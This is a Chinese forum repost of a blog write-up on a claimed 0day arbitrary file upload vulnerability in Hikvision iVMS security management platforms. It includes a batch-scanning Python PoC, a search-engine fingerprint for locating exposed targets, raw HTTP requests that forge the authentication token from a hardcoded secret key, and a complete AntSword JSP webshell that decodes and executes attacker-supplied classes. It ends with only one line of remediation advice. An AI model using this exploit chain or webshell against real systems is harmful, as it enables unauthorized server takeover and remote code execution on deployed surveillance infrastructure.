|
|
本帖最后由 luozhenni 于 2023-5-31 22:02 编辑
海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
原文链接:海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
OidBoy_G WIN哥学安全 2023-05-31 15:46 发表于天津
1产品简介
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。
2漏洞概述海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
3影响范围海康威视综合安防系统iVMS-5000海康威视综合安防系统 iVMS-87004复现环境鹰图指纹:web.body="/views/home/file/installPackage.rar"
5漏洞复现检测脚本
PoC:https://github.com/sccmdaveli/hikvision-poc
- import requests
- import urllib3
- import urllib
- import hashlib
- import argparse
- from colorama import init
- from colorama import Fore
- init(autoreset=True)
- urllib3.disable_warnings()
- head = {
- "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
- "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"
- }
- def md5encode(url):
- if url.endswith("/"):
- path = "eps/api/resourceOperations/uploadsecretKeyIbuilding"
- else:
- path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding"
- encodetext = url + path
- input_name = hashlib.md5()
- input_name.update(encodetext.encode("utf-8"))
- return (input_name.hexdigest()).upper()
- def poc(url):
- if url.endswith("/"):
- path = "eps/api/resourceOperations/upload?token="
- else:
- path = "/eps/api/resourceOperations/upload?token="
- pocurl = url + path + md5encode(url)
- data = {
- "service": urllib.parse.quote(url + "/home/index.action")
- }
- try:
- response = requests.post(url=pocurl,headers=head,data=data,verify=False,timeout=3)
- if response.status_code==200:
- print(Fore.GREEN + f"[+]{url}存在海康威视iVMS 综合安防任意文件上传漏洞!!!!")
- else:
- print(Fore.RED + f"[-]{url}不存在海康威视iVMS 综合安防任意文件上传漏洞")
- except:
- pass
- if __name__ == '__main__':
- parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxx\npython3 ivms.py -f file.txt',
- description='ivms漏洞检测poc',
- )
- p = parser.add_argument_group('ivms 的参数')
- p.add_argument("-u", "--url", type=str, help="测试单条url")
- p.add_argument("-f", "--file", type=str, help="测试多个url文件")
- args = parser.parse_args()
- if args.url:
- poc(args.url)
- if args.file:
- for i in open(args.file,"r").read().split("\n"):
- poc(i)
使用方式:单个url检测:python3 ivms-poc.py -u url多个url检测:python3 ivms-poc.py -f file.txt效果:
手动复现
漏洞url:/eps/api/resourceOperations/uploadbp抓取首页包,尝试访问接口(发现token需要进行鉴权)
- POST /eps/api/resourceOperations/upload HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Accept-Encoding: gzip, deflate
- Referer: http://you-ip
- Connection: close
- Cookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9
- Upgrade-Insecure-Requests: 1
- Content-Length: 62
- service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action
构造token绕过认证 (内部机制:如果token值与请求url+secretkey的md5值相同就可以绕过认证)secretkey是代码里写死的(默认值:secretKeyIbuilding)token值需要进行MD5加密(32位大写)组合:token=MD5(url+"secretKeyIbuilding")
重新验证
可以看到,成功绕过构造文件上传payload- POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Connection: close
- Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
- Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
- Upgrade-Insecure-Requests: 1
- Content-Length: 174
- ------WebKitFormBoundaryGEJwiloiPo
- Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
- Content-Type: image/jpeg
- test
- ------WebKitFormBoundaryGEJwiloiPo
显示上传成功且返回了resourceUuid值验证路径:http://url/eps/upload/resourceUuid的值.jsp
6漏洞利用
直接上传蚁剑jsp马子- <%!
- class U extends ClassLoader {
- U(ClassLoader c) {
- super(c);
- }
- public Class g(byte[] b) {
- return super.defineClass(b, 0, b.length);
- }
- }
- public byte[] base64Decode(String str) throws Exception {
- try {
- Class clazz = Class.forName("sun.misc.BASE64Decoder");
- return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
- } catch (Exception e) {
- Class clazz = Class.forName("java.util.Base64");
- Object decoder = clazz.getMethod("getDecoder").invoke(null);
- return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
- }
- }
- %>
- <%
- String cls = request.getParameter("passwd");
- if (cls != null) {
- new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
- }
- %>
上传成功,尝试连接
7修复建议
关闭互联网暴露面访问的权限,文件上传模块做好权限强认证
Tips:文章来源:csdn
https://blog.csdn.net/qq_41904294/article/details/130807691
扫码回复“加群”加入交流群
|
|
发表于 2023-5-31 22:02:52